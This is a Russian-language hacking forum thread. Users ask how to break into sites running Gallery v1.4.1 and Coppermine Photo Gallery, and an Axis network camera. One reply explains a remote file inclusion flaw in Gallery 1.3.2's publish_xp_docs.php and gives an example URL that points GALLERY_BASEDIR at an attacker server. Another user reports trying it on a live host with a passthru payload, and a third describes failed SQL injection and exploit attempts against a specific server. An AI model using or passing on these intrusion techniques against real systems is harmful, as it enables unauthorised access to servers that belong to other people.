Может это и не совсем форум, но я даже не знаю к чему это отнести. Прошу рассказать о знаниях по поводу Powered by Gallery v1.4.1. Если есть методы по взлому - прошу поделиться.
Уязвимость обнаружена в 1.3.2. И поэтому тебе это врятли поможет но навсякий случай попробуй. Gallery – система управления изображениями от http://gallery.sourceforge.net. Gallery v1.3.2 содержит новую особенность, которая позволяет пользователям публиковать изображения Web сайте, используя систему публикации Windows XP Publishing subsystem. Обнаруженная уязвимость в этой особенности (а точнее в сценарии publish_xp_docs.php) позволяет злонамеренному пользователю обработать URL таким образом, что он может получить удаленный доступ к Web серверу с привилегиями Web сервера. Пример: http://hostname/gallery/publish_xp_docs.php? GALLERY_BASEDIR=http://your.evil.server.tdl/
такая тема - какие версии только не пробовал, резальт один: Fatal error: Call to undefined function: _() in /home/users/gallery/htdocs/publish_xp_docs.php on line 28 это типа пат4енная, или на своей стороне нужно по-особому index.php сосотавить (у меня простой passthru был)???
Ой блин да простят меня все за то что я такое старьё поднял но у меня тут вопрос ребром встал а баги как таковой не нашол интересует Coppermine Photo Gallery v1.3.2 перерыл всё а толком ничего нету галлерея вроде не патченная но файла publish_xp_docs.php и xp_publish.php нема =(
Из разрешённых на заливку файлов только формат .jpg остальное всё в топке (запрещено) sql иньекция не катит =( сплойт себя немного странно повёл но результат 1 файла с которым работает сплойт нет на серваке =( Также к слову там установленна Code: Axis 2120 Network Camera 2.30 но по уязвимости этого вообще нечего не нашол толком =(
